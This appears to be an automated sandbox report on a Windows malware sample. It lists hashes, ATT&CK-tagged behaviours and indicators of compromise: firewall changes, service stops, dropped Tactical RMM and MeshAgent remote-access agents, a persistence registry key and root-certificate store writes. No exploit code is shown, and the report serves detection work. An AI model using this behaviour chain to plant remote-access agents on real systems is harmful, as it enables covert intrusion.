fc39e6cb0ae28dcd647eedbb041a5c9aa295b2db883232960ef0a48d86e93856

Analysis

max time kernel
149s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
01/02/2024, 04:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecuriteInfo.com.W64.Bulz.AY.gen.Eldorado.23576.26484.exe
Size

5.0MB
MD5

b8b966db021d7b8aaee6965b3dba4a28
SHA1

189ed55b5e1bef3f1f2fde5c092f70dc6779a3f6
SHA256

fc39e6cb0ae28dcd647eedbb041a5c9aa295b2db883232960ef0a48d86e93856
SHA512

02a14577c9623c5bd16870e9de0fde270f456f93666f23ad309bead398f7d3493b321a4281283bb632b38a5581c2a07c5697095ddef1ce14d80c5ef1abc4c6a3
SSDEEP

49152:jA/ljznTzE1IxDcrb/T8vO90d7HjmAFd4A64nsfJg5iz81LMyGBK1wVVE3+Yezze:4TzE1IxJu48Vi2zVSzEg+eRp

Score

8^/10

discovery evasion persistence

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
82	1356	powershell.exe
85	1356	powershell.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1636	netsh.exe
4004	netsh.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\" "	meshagent.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 12 IoCs

pid	Process
4624	tacticalagent-v2.6.1-windows-amd64.exe
5044	tacticalagent-v2.6.1-windows-amd64.tmp
4496	tacticalrmm.exe
4940	tacticalrmm.exe
3636	meshagent.exe
396	MeshAgent.exe
1968	MeshAgent.exe
2172	tacticalrmm.exe
1256	python.exe
2408	MeshAgent.exe
3160	tacticalrmm.exe
1004	choco.exe

Loads dropped DLL 8 IoCs

pid	Process
1256	python.exe
1256	python.exe
1256	python.exe
1256	python.exe
1256	python.exe
1256	python.exe
1256	python.exe
1256	python.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 5 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\8089D19D06B2F18DB80B6C5FDC6DE12D5F4FCE61	tacticalrmm.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\choco.exe.log	choco.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32\lib\winxptheme.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\_decimal.pyd	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_internal\resolution\resolvelib\__init__.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_vendor\webencodings\mklabels.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32com\olectl.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\python38._pth	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_internal\operations\install\wheel.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\meshagent.exe	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_internal\cli\main_parser.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\setuptools\_distutils\util.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\setuptools\command\build_clib.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32comext\shell\test\testShellFolder.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_vendor\urllib3\contrib\__init__.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\chardet\cli\chardetect.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32\lib\pywin32_testutil.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\_socket.pyd	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\isapi\isapicon.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32comext\shell\demos\IFileOperationProgressSink.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pythonwin\pywin\__init__.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32com\servers\interp.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pkg_resources\_vendor\appdirs.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32com\HTML\QuickStartServerCom.html	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\WMI-1.5.1.dist-info\top_level.txt	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\api-ms-win-crt-utility-l1-1-0.dll	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\setuptools\command\__init__.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32\test\test_win32trace.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32comext\axscript\Demos\client\ie\dbgtest.htm	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_vendor\requests\exceptions.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pkg_resources\extern\__init__.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pythonwin\pywin\framework\stdin.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32\lib\sspi.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\api-ms-win-core-interlocked-l1-1-0.dll	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_internal\build_env.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_vendor\packaging\__about__.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pythonwin\pywin\docking\DockingBar.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\isapi\install.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_internal\utils\temp_dir.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\setuptools\_distutils\command\clean.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\api-ms-win-crt-convert-l1-1-0.dll	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_internal\models\candidate.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_vendor\html5lib\filters\sanitizer.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pythonwin\pywin\framework\sgrepmdi.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pythonwin\pywin\tools\browser.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\chardet-4.0.0.dist-info\INSTALLER	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\wheel\macosx_libfile.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32com\test\testPippo.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\urllib3\filepost.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32ctypes\win32cred.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\setuptools-51.3.3.dist-info\INSTALLER	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32\Demos\security\regsecurity.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\python38.zip	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\isapi\samples\redirector.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_internal\commands\wheel.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\api-ms-win-crt-string-l1-1-0.dll	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pythonwin\pywin\scintilla\view.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\requests-2.25.1.dist-info\REQUESTED	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\setuptools\_distutils\command\bdist.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32comext\mapi\mapitags.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\_sqlite3.pyd	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\certifi-2020.12.5.dist-info\INSTALLER	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Scripts\easy_install.exe	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\urllib3\util\queue.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\chardet\euctwfreq.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_vendor\urllib3\connectionpool.py	tacticalrmm.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
552	sc.exe
2452	sc.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2396	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	MeshAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2451 = "Saint Pierre Daylight Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2611 = "Bougainville Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-491 = "India Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1972 = "Belarus Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-372 = "Jerusalem Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2592 = "Tocantins Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-105 = "Central Brazilian Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2871 = "Magallanes Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2431 = "Cuba Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-771 = "Montevideo Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2572 = "Turks and Caicos Standard Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-562 = "SE Asia Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-622 = "Korea Standard Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-152 = "Central America Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-682 = "E. Australia Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	tacticalrmm.exe

Modifies system certificate store 2 TTPs 13 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d60168000000010000000800000000409120d035d901030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	tacticalrmm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	tacticalrmm.exe
